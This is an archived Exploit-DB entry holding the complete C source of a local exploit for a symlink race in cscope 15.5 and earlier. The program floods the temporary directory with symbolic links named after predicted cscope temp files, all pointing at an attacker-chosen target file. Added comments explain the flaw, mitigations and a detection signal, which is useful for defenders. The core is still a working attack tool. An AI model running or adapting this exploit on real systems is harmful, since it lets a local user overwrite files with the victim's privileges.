Cscope <= 15.5 Symlink Vulnerability Exploit

2004-12-17T00:00:00
ID EDB-ID:695
Type exploitdb
Reporter Gangstuck
Modified 2004-12-17T00:00:00

Description

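Cscope <= 15.5 Symlink Vulnerability Exploit: a local exploit for the Linux platform. The listing below pre-creates symbolic links in the system temporary directory under names of the form cscope<pid>.<n>, so the underlying issue is a predictable temporary-file name being followed through a symbolic link.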

                                        
/* RXcscope exploit: cscope version 15.5 and earlier */
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;

/* Size limit passed to snprintf() when each link path is built; the buffer in
 * main() is declared one byte larger (BSIZE + 1). */
#define BSIZE 64

/*
 * Proof-of-concept entry point for the cscope <= 15.5 symlink issue.
 *
 * Prints a banner, requires exactly two arguments (av[1]: the path every link
 * points at, av[2]: how many process ids ahead of the current one to cover),
 * then calls symlink() once per process id, using link names of the form
 * "<P_tmpdir>/cscope<pid>.<n>" where <n> alternates 1, 2, 1, 2, ...
 *
 * Defender notes: the technique depends on temporary-file names that can be
 * predicted from a process id (presumably the naming cscope <= 15.5 uses --
 * confirm against the vendor advisory). A program that later opens such a
 * path without O_EXCL or O_NOFOLLOW follows the link and writes to the link
 * target with its own privileges. Mitigations: update cscope to a release
 * that fixes its temporary-file handling, create temporary files with
 * mkstemp(), and enable the fs.protected_symlinks sysctl on Linux. A burst of
 * symlink() calls producing cscope<pid>.<n> entries in the temporary
 * directory is a usable detection signal.
 *
 * Returns 1 on a usage error and 0 otherwise; symlink() results are ignored.
 */
int
main(int ac, char *av[]) {
        pid_t cur;
        u_int i=0, lst;
        char buffer[BSIZE + 1];
        
        /* Banner only; no effect on the file system. */
        fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
                        " version 15.5 and minor \n" \
                        " Gangstuck / Psirac\n" \
                        " &lt;research@rexotec.com&gt;\n\n");
                        
        /* Exactly two operands are required; otherwise print usage and stop. */
        if (ac != 3) {
                fprintf(stderr, "Usage: %s &lt;target&gt; &lt;max file creation&gt;\n", av[0]);
                return 1;
        }
        
        /* The range of ids starts at this process's own pid. */
        cur=getpid();
        /* NOTE(review): atoi() yields 0 for non-numeric input and does no range
         * checking, and the sum is stored in an unsigned variable. */
        lst=cur+atoi(av[2]);
        
        /* NOTE(review): lst is u_int but is printed with %d. */
        fprintf(stdout, " -&gt; Current process id is ..... [%5d]\n" \
                        " -&gt; Last process id is ........ [%5d]\n", cur, lst);
        
        /* Pre-increment means the first id used is the current pid + 1, and the
         * loop stops before lst itself. */
        while (++cur != lst) {
                /* i toggles between 1 and 2 on successive iterations. Output is
                 * limited to BSIZE bytes including the terminator, so a long
                 * P_tmpdir is silently truncated (return value not checked). */
                snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
                /* Creates the link buffer -> av[1]; failures (for example the name
                 * already existing) are not reported. */
                symlink(av[1], buffer);
        }

        return 0;
}

// milw0rm.com [2004-12-17]